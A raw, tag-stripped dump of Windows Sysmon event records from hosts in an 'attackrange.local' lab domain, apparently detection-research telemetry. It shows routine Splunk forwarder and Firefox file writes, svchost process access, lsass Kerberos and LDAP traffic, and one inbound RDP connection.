08:11:07.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1600-00000000D001}1192C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000811001Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.625{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1600-00000000D001}1192C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000811000Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.328{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01D4864089724B4118E39341570057C6,SHA256=B4E2F898CF0AA6D612E45455FCCB5CEB00EA4160FE4F05CA5C021DF36808003F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055751Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E839E79DB38C40EC7F18BF1726805928,SHA256=874C120A27AD8B6F62850BFD64D064F73AB3E4EBDD7234179DC140CEADD762F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C94FD9ACE15646AE05DCCC96ABFDF06F,SHA256=E1445FE012BC21FCFCFEDE8C5D7094B8307A3CEA6ED4AADA26EBF2FCD7E862F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811014Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.656{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE0C8F635A18A736AABA19ABE8C44740,SHA256=B185318C747ECD4EFE62078D16173B5CB85471892FD2145E4AEE14A207008EFE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811013Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.360{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3FAA2CF2E0C23D916728C4A279DF9681,SHA256=72AFEC1C7CC471ED39DFCB3FC99BB3CD597B20D8A5C41F55E12F76E907CF8361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055750Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11D9B9A5B36C19BEE0A71016E68687F1,SHA256=5CB353F6D0CB319F2C4E05F78FD54BFF5B9C6FD908F5A7A973ACDF0690C0F6D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055749Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:08.693{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BDA0A491CD975C8104B7943440407826,SHA256=9C8656D2CFC91CFC9485278217EA212FAF9A3174BB841392CD0F2E1DFCBFDDDB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055761Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:09.777{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30A93410A2721E4B6E10115BB5416B1B,SHA256=2C8492668CB7CBEA20E407CBE5B9EAB1E3548EB971FA61506DC19EF3F0C6396D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811023Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.169{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57512-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811022Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.167{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57511-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811021Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.165{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57510-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal88kerberos 354300x8000000000000000811020Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.055{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57509-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389ldap 354300x8000000000000000811019Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.840{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.15win-host-623.attackrange.local60128-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389- 354300x8000000000000000811018Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:07.826{0C1E0330-F91B-60EB-F879-00000000D001}4008C:\Windows\System32\taskhostw.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57508-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal389ldap 22542200x8000000000000000811017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:08.068{0C1E0330-F91B-60EB-F879-00000000D001}4008win-dc-890.attackrange.local0::ffff:10.0.1.14;C:\Windows\System32\taskhostw.exe 23542300x8000000000000000811016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:09.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=369F275FF4B5276DDDEE68A37185D4C4,SHA256=96067E0BCB298680676CD2002906ED9782CA306BD651701ED1E30338EBFEC27D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055760Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.540{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57512-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055759Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.538{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57511-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055758Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.536{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57510-false10.0.1.14win-dc-890.attackrange.local88kerberos 354300x80000000000000001055757Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.433{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60130- 354300x80000000000000001055756Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.426{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57509-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055755Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.318{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60129- 354300x80000000000000001055754Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.211{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-890.attackrange.local389-false10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal60128- 354300x80000000000000001055753Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.197{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57508-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001055752Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:01.014{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse195.78.54.188-51534-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001055773Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.801{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=696BA2FA4DCDD68E628AD3E9AE18CCEE,SHA256=F19EFC9F943A63111763BC937E4E4CA830A148EDB92E2394890206655DE09133,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811024Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:10.406{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88512DE157D0D1FB4DA6A9EE4CE794DB,SHA256=9113FE32A08E45D13E033AFC5D1420396066A8F45CFA130E0B4B0252DF216CCF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055772Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=118E473BDE207CD2FFAFD72159EB51A2,SHA256=EBD972BF143857077B412FFAD25462B5FE2E3E14A0ECC9E23F702EE143AA6119,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055771Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=E3D0D518D8F5AB6188D71F4763FCAB05,SHA256=AEB57D919F136FEBE2AB5919408C014C77C2AFF6F0903073DD7C1CCC9824946B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055770Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=5B3DFDFA5E35F56CA7F764BBC7C9C3FF,SHA256=DAC1F98E8C6B51C8309F0C654DD3221E61F1E72950AF05C722B624EEF4E59705,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055769Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.147{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=ED934469C1BD232129DBB129F5346076,SHA256=27D1726CC3D75A72FE6A44116C0B5DB18E9452F1F3C5FC2007BE17C39D1FB363,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055768Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=B763D3E59D99DD894AC7202596875F56,SHA256=B8A9C03EC25A2AE945DA0950E0198FB74FEA40D2A7F962F140EAE7724B22FF1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055767Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DA7E671A6DCB35CE2AF1429D47884668,SHA256=86C45333EDB7A0855366D1267E9266DD336783A26831027E711BA3896DD5CB61,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2969D6F659F665766AC35DC7A220B3DA,SHA256=96818C32E32A64710E77D001CAB246DDF4D608DF4F8678A0A13E0901D6247394,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=81057BAC82AE81D315EE7F26A712C036,SHA256=105666E0549EA4168E8B1F23D3BAEED7A103E6B699CF765DF7EF7B31305AB48C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=0BBFF5DC689D8479642C6ADF43503261,SHA256=C3490BA35B0DA0F3ED73D5F561D529F22E7B0BE4F83B1C54B1078D10E76FABA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055763Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=43AC3ADAF0510569267C5B4C2A49C84F,SHA256=817CDF6F4796AE79E7066780D772E70F5BD89CFF5048AA574CFB181B28B968F3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055762Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:10.131{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CD3063D93783F9A91BAB7DF9F836E803,SHA256=4D7CBD4D4682EF42A840FCF34917AA4F8E8202B26362CA4DF63EF99655DFA4FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055776Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.819{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C47AB2E29C038AE955C3F0D23B83EC11,SHA256=13241980745EF4E54014CDEB826F77A5FF96371C030157DB76DE06CDDBACB32D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811025Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:11.422{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82A8A3CE0A2B5F65367E5520C89E5A29,SHA256=67A6291F3EE2C9A81285ACBFA0EA254A3A012DB2C72297EE84A7DC9B5D5AF656,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055775Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:03.669{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62018-false10.0.1.12-8000- 23542300x80000000000000001055774Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:11.454{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=11D9B9A5B36C19BEE0A71016E68687F1,SHA256=5CB353F6D0CB319F2C4E05F78FD54BFF5B9C6FD908F5A7A973ACDF0690C0F6D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055777Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:12.838{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=157BB16B1BF62A27E880E5FF84429401,SHA256=0BA7EF3C774797E546E2BF151292CFAFC3BAF31EADB39EBA17FC5E98468180C5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811027Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:12.438{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BAD55CE88917721C0E3CDA9E10FBE35,SHA256=4FDA3F702B0112BD4B28BF4680B009DA3AF8580800941A2F6DD3448995C3D521,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000811026Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:10.368{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57513-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001055778Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:13.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE970960B93E29FCD4D1C6C2C67EEDE8,SHA256=15AE34B13F43EC8BB079455A470C41107A7817F251CAB02EB0D9D9CFDE80B5B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811028Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:13.438{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=257E57710652BD689D8039C9E18BFFA7,SHA256=FD4A1747CB36C6008DBDD791DC0F2E4954394009EC960C83141A20D7ECF70F2F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055779Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:14.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F444D338EAA82D61CCFE8AD6D7463C17,SHA256=7ABB664000109C5E523C86B67A31EC6CDE96789176F9DF0B9BC7E66D2C6223B2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811029Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:14.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1EBE3132AB8B5BDE3B26B883AD627755,SHA256=6E5196740E40293EC1F789C7F92E1FA6EB1AB42CF29210EC94F3E98FD76451A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055781Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.899{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B9AA9B959B0503282C8615996D3C971,SHA256=95703757889BF2A114DB1FE99823A1099450FEBAF43F538FBF592A408FC0DEE8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811030Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:15.496{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BCD55DCA5161A715C36590D78CA3D47,SHA256=DEDDC1A187CB15BD515F40D9821BE5923C3BF9F5BA1A0F84F656BA7B74134895,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055780Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:15.668{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=95AE3592702413148055EA5B06620AA0,SHA256=33D8C0F54254ED2E7D05DD6B2966B388E52DC8BDF70C8B286454FE70FE84B52B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:11:16.917{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6DE85E9973DC78AFA188786E885289C0,SHA256=EF7A9DC1F95AAFF4FC6589D7B780BA880B13CC748976D76D5318CC0A4E745D1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000811031Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:11:16.527{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 